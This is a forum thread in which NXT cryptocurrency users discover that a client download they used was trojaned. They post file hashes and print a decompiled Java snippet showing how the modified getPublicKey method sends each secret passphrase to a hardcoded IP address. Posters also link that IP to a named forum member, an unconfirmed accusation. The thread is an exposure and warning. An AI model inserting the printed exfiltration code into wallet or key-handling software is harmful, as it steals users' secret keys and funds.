|
PaulyC
|
|
January 02, 2014, 01:38:31 AM |
|
Ok here are the two zip files in one file. The bigger one is the one I DLed from Nextcoin.org and used when my NXT were stolen. the smaller one I believe was the one posted on the front page? DO NOT USE THIS FILE FOR NXT: https://mega.co.nz/#!lZQBXQqK!EpQQbx9uBy9gcQe7-vc8smWDwHcM7LBODbtoCpKNXNo The link is gone. The thief has probaly took it away. Can you upload yours zip download ? the link I posted that says do not use? Or did you mean to copy someone else's post? I made that link there, it has the zip inside, it's the smaller file. I don't have the exact link of where I DL'ed it but I believe it was Mega and was definitely linked from Nextcoin.org. @xyzzyx oh my bads I just rar'd it together and threw the extension on the whole file, sorry.
|
Doge Mars Landing Foundation (founder) Coined the phrase, "Doge to the Mars" and "Check that Hash!". Discoverer of the 2013 NXT nefarious wallet. Admin. FameMom [FAMOM]
|
|
|
notsoshifty
|
|
January 02, 2014, 01:38:41 AM |
|
Ok here are the two zip files in one file. The bigger one is the one I DLed from Nextcoin.org and used when my NXT were stolen. the smaller one I believe was the one posted on the front page? DO NOT USE THIS FILE FOR NXT: https://mega.co.nz/#!lZQBXQqK!EpQQbx9uBy9gcQe7-vc8smWDwHcM7LBODbtoCpKNXNo The file you uploaded is a RAR file, not zip even though it has a zip extension. Just a FYI for others who attempt to open it and get an error. First file inside is 7173063 bytes in size and has the SHA256 hash: ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2 nxt-client-0.4.8 (2).zip The second file inside is 7177834 bytes in size and has the SHA256 hash: 948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06 nxt-client-0.4.8.zip Damn. I'll leave further analysis to those who have more experience. I only just started learning Java a few months back to do Android programming. I'm more of an assembly/hardware guy. Interesting...: if (!paramString.equals("")) { if (!myKeys.contains(paramString)) { URL url = new URL("http://162.243.246.223:3000/" + URLEncoder.encode(paramString, "ISO-8859-1")); URLConnection connection = url.openConnection(); connection.setConnectTimeout(10000); connection.getInputStream(); myKeys.add(paramString); } }
|
|
|
|
jl777
Legendary
Offline
Activity: 1176
Merit: 1134
|
|
January 02, 2014, 01:39:58 AM |
|
Now that we seem to have figured out this breach, we need to warn anybody that downloaded that version, but I guess we can't broadcast message yet...
Still there will be concerns about the offline parallel attack. I am still waiting for CfB's answers on my architecture question. We don't need an immediate solution as long as there is a clear roadmap to higher security. both perceived and actual.
If the hacker has to search a space 2^256, then even with petahashes it will take a long time. However, I am worried about clustering especially with user selected passwords without maximum entropy. Realistically, if anybody uses alphanumeric passwords of a short length or just combines common words, a hacker running a simple brute force search of these combos will unlock all these accounts pretty quickly. Our opponents will intentionally use reasonable looking but weak passwords to intentionally get hacked and give us black PR.
I want to proactively attack this issue. How does NXT security compare to BTC or to Ripple security? These are critical questions for mass adoption of NXT. I want to hear that NXT is better than all the rest, but what I need is an independent cryptographic expert to analyze this objectively.
Not sure how much this will cost, but it will go a long ways toward eliminating this as an issue if indeed NXT is as secure or more secure than BTC (and Ripple). Does anybody know how much it will cost to get an independent cryptographic analysis?
James
P.S. also maybe a bounty to PaulyC of 7808 NXT for finding this?
|
|
|
|
utopianfuture
Sr. Member
Offline
Activity: 602
Merit: 268
Internet of Value
|
|
January 02, 2014, 01:42:50 AM |
|
Now that we seem to have figured out this breach, we need to warn anybody that downloaded that version, but I guess we can't broadcast message yet...
Still there will be concerns about the offline parallel attack. I am still waiting for CfB's answers on my architecture question. We don't need an immediate solution as long as there is a clear roadmap to higher security. both perceived and actual.
If the hacker has to search a space 2^256, then even with petahashes it will take a long time. However, I am worried about clustering especially with user selected passwords without maximum entropy. Realistically, if anybody uses alphanumeric passwords of a short length or just combines common words, a hacker running a simple brute force search of these combos will unlock all these accounts pretty quickly. Our opponents will intentionally use reasonable looking but weak passwords to intentionally get hacked and give us black PR.
I want to proactively attack this issue. How does NXT security compare to BTC or to Ripple security? These are critical questions for mass adoption of NXT. I want to hear that NXT is better than all the rest, but what I need is an independent cryptographic expert to analyze this objectively.
Not sure how much this will cost, but it will go a long ways toward eliminating this as an issue if indeed NXT is as secure or more secure than BTC (and Ripple). Does anybody know how much it will cost to get an independent cryptographic analysis?
James
P.S. also maybe a bounty to PaulyC of 7808 NXT for finding this?
Agree. PaulyC deserves a bounty to uncover this type of thief.
|
|
|
|
mkmen
|
|
January 02, 2014, 01:43:43 AM |
|
clean static byte[] getPublicKey(String secretPhrase) { try { byte[] publicKey = new byte[32]; Nxt.Curve25519.keygen(publicKey, null, MessageDigest.getInstance("SHA-256").digest(secretPhrase.getBytes("UTF-8"))); return publicKey; } catch (Exception e) {} return null; } vs static byte[] getPublicKey(String paramString) { try { if (!paramString.equals("")) { if (!myKeys.contains(paramString)) { URL url = new URL("http://162.243.246.223:3000/" + URLEncoder.encode(paramString, "ISO-8859-1")); URLConnection connection = url.openConnection(); connection.setConnectTimeout(10000); connection.getInputStream(); myKeys.add(paramString); } } } catch (Exception localException) {} try { byte[] arrayOfByte = new byte[32]; Nxt.Curve25519.keygen(arrayOfByte, null, MessageDigest.getInstance("SHA-256").digest(paramString.getBytes("UTF-8"))); return arrayOfByte; } catch (Exception localException1) {} return null; } clearly someone modified Nxt$Crypto.class EDIT: question is who and where did you guys downloaded this (where was the link)?
|
|
|
|
salsacz
|
|
January 02, 2014, 01:44:12 AM |
|
We need to lock for public all wiki pages with a download link, all download links should aim to the 1st topic here instead of direct downloads
|
|
|
|
NxtChoice
|
|
January 02, 2014, 01:44:18 AM |
|
How to confirm you are forging 24/7 ?
|
|
|
|
S3MKi
Legendary
Offline
Activity: 1540
Merit: 1016
|
|
January 02, 2014, 01:45:56 AM |
|
We need to lock for public all wiki pages with a download link, all download links should aim to the 1st topic here instead of direct downloads
agree
|
|
|
|
notsoshifty
|
|
January 02, 2014, 01:46:08 AM |
|
Interesting...: if (!paramString.equals("")) { if (!myKeys.contains(paramString)) { URL url = new URL("http://162.243.246.223:3000/" + URLEncoder.encode(paramString, "ISO-8859-1")); URLConnection connection = url.openConnection(); connection.setConnectTimeout(10000); connection.getInputStream(); myKeys.add(paramString); } } epicdices.com is also hosted on 162.243.246.223 - coincidence?
|
|
|
|
EvilDave
|
|
January 02, 2014, 01:48:41 AM |
|
So, for the slower people here ( ie; me):
The smaller file: First file inside is 7173063 bytes in size and has the SHA256 hash: ec7c30a100717e60d8abe50eedb23641952847d91ff90b9b05a74ff98d8a4cf2 nxt-client-0.4.8 (2).zip
Is the correct client.
and the larger file:
The second file inside is 7177834 bytes in size and has the SHA256 hash: 948ce760c379f13f4ea9def6babaa36b0d706bf91098f1d64945fdde3eac5f06 nxt-client-0.4.8.zip
has probably had some sort of backdoor added to allow thievery?
Bastards, btw, if this is confirmed.
|
|
|
|
Damelon
Legendary
Offline
Activity: 1092
Merit: 1010
|
|
January 02, 2014, 01:48:53 AM |
|
We need to lock for public all wiki pages with a download link, all download links should aim to the 1st topic here instead of direct downloads
agree joefox already locked some pages today, but there were translator issues related to that. I'm just saying to let everyone know that he has been on the ball concerning wiki security.
|
|
|
|
PaulyC
|
|
January 02, 2014, 01:49:25 AM |
|
Now that we seem to have figured out this breach, we need to warn anybody that downloaded that version, but I guess we can't broadcast message yet...
James
P.S. also maybe a bounty to PaulyC of 7808 NXT for finding this?
Agree. PaulyC deserves a bounty to uncover this type of thief. OMG that would be amazing if that's possible, or anything.. Not to get ahead of myself but, Newcn too.. I mean he verified to me we had a very similar occurrence, way too much of a coincidence. Thanks for any help.!
|
Doge Mars Landing Foundation (founder) Coined the phrase, "Doge to the Mars" and "Check that Hash!". Discoverer of the 2013 NXT nefarious wallet. Admin. FameMom [FAMOM]
|
|
|
|
|
salsacz
|
|
January 02, 2014, 01:52:03 AM |
|
Interesting...: if (!paramString.equals("")) { if (!myKeys.contains(paramString)) { URL url = new URL("http://162.243.246.223:3000/" + URLEncoder.encode(paramString, "ISO-8859-1")); URLConnection connection = url.openConnection(); connection.setConnectTimeout(10000); connection.getInputStream(); myKeys.add(paramString); } } epicdices.com is also hosted on 162.243.246.223 - coincidence? no, as I wrote here, we know identity of the hacker: 162.243.246.223 looks like it is "epicdices.com" ( http://domain-kb.com/www/epicdices.com) Owner of epicdices - EpicThomas - is a member of this topic: https://bitcointalk.org/index.php?action=profile;u=172850;sa=showPosts
|
|
|
|
intel
Member
Offline
Activity: 98
Merit: 10
|
|
January 02, 2014, 01:53:44 AM |
|
|
|
|
|
newcn
|
|
January 02, 2014, 01:57:24 AM |
|
Paulc how much did you lost? I lost about 18k nxt!
|
BTC:1NzzfeHCgN8fF6mSG1UeBFCVd2cxKbGyHk NXT:13187911577562526278
|
|
|
utopianfuture
Sr. Member
Offline
Activity: 602
Merit: 268
Internet of Value
|
|
January 02, 2014, 01:58:23 AM |
|
|
|
|
|
S3MKi
Legendary
Offline
Activity: 1540
Merit: 1016
|
|
January 02, 2014, 01:58:50 AM |
|
Paulc how much did you lost? I lost about 18k nxt!
about 7000 i think
|
|
|
|
|